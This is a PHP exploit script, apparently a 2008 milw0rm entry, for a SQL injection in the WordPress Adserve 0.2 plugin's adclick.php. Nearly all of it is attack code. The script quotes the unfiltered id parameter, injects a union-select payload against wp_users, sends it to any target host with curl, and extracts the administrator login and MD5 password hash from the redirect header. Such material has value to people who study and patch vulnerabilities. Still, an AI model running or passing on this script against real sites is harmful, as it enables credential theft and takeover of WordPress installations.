Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit by h3m4n

VIEWS: 46 PAGES: 2

									                           Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit                             Page 1/2
  1    <?
  2    # WordPress Adserve plugin v 0.2 Sql Injection Exploit
  3    #
  4    # Plugin Homepage−http://www.irisco.it/?page_id=40
  5    #
  6    # Found by:enter_the_dragon
  7    #
  8
  9    #   Vuln code
  10   #
  11   #   −In adclick.php
  12   #
  13   #   if (isset($_GET[’id’])) {
  14   #      Header("Location: ".iri_AdServe_BannerClick($_GET[’id’])
  15   #
  16   #   −In   iri_AdServe_BannerClick function
  17   #
  18   #          return $wpdb−>get_var("SELECT url FROM $table_name WHERE id=$id;");
  19   #
  20   #
  21   #
  22
  23   # Exploit
  24   #
  25   # id variable isnt filtered so we can inject and check the output in the Location response−header
  26   # If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
  27   #
  28   #
  29
  30
  31
  32
  33   echo "\n";
  34   echo "−−−−−−−WordPress Adserve plugin v 0.2 Sql Injection Exploit−−−−−−−"."\n";
  35   echo "−−−−−−−−−−−−−−−−−−−coded by : enter_the_dragon−−−−−−−−−−−−−−−−−−−−"."\n";
  36   echo "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"."\n";
  37   if ($argc!=3)
  38   {
  39   echo " Usage:       $argv[0] target_host wp_path \n";
  40   echo " target_host:             Your target ex www.target.com \n";
  41   echo " wp_path:     WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
  42   echo "\n";
  43   exit;
  44   }
  45
  46
  47   $query=$argv[1];
  48   $query.=$argv[2];
  49   $query.="wp−content/plugins/wp−adserve/adclick.php?";
  50   $query.="id=−1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
  51
  52

enter_the_dragon                                                                                                      01/30/2008
                          Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit             Page 2/2
  53   if(function_exists(curl_init))
  54   {
  55     $ch = curl_init("http://$query");
  56     curl_setopt($ch, CURLOPT_HEADER,true);
  57     curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  58     curl_setopt($ch, CURLOPT_TIMEOUT,10);
  59     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
  60     $html=curl_exec($ch);
  61     $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  62     curl_close($ch);
  63
  64        if($returncode==302)
  65           {
  66               $pattern="/\|(.*)?\|([a−z0−9]{32})\|/";
  67               if(preg_match($pattern,$html,$matches))
  68                 {
  69                   $adminusername=$matches[1];
  70                   $adminpass=$matches[2];
  71                   echo "Admin Login:$adminusername\n" ;
  72                   echo "Admin Pass :$adminpass\n";
  73                 }
  74           }
  75               else
  76           {
  77               exit ("Exploit Failed :( \n");
  78           }
  79
  80
  81   }
  82   else
  83   exit("Error:Libcurl isnt installed \n");
  84
  85   ?>
  86
  87   # milw0rm.com [2008−01−30]




enter_the_dragon                                                                                     01/30/2008

								
To top